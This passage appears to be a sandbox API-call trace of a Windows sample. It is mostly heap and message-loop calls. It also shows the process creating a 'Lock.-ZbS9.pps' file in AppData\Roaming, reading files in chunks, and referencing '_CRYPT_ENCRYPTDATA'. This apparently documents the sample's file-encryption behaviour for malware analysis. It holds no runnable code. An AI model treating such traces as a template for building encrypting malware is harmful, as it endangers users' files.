Flags=0x0, Size=0x8) returned 0x2e54c98 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0217.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0217.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0217.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x3be0e78 [0217.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0217.336] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0217.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0e78 | out: hHeap=0x970000) returned 1 [0217.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0217.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0217.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14818 [0217.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0217.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0217.336] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.-ZbS9.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.-zbs9.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0219.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0219.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0219.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0219.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0219.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0219.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0219.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0219.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0219.788] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0219.789] TranslateMessage (lpMsg=0x8cf708) returned 0 [0219.789] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0219.789] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0219.789] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.789] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0219.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0219.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0219.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0219.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0219.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0219.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0219.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0219.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0219.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5d020 [0219.794] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0219.794] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0xf038, lpOverlapped=0x0) returned 1 [0219.797] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0219.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0219.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0219.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0219.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0219.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf038) returned 0x2f24820 [0219.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5d020 | out: hHeap=0x970000) returned 1 [0219.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0219.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0219.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0219.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0219.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0219.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0219.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0219.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0219.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf038) returned 0x2f33860 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0219.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf038) returned 0x2f24820 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0219.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0219.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0219.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0219.805] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0219.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0219.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf038) returned 0x2f24820 [0219.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0219.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fe8 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0219.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f98 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0219.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0219.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0219.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0219.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0219.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0219.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0219.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0219.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf038) returned 0x2e80330 [0219.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0219.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0219.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0219.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0219.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0219.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0219.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0219.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0219.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0219.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0219.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0219.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0219.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0219.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0219.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0219.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0219.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0219.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0219.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0219.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0219.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0219.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0219.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0219.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0219.812] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0219.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0219.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0219.812] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0219.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0219.812] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0219.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0219.813] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 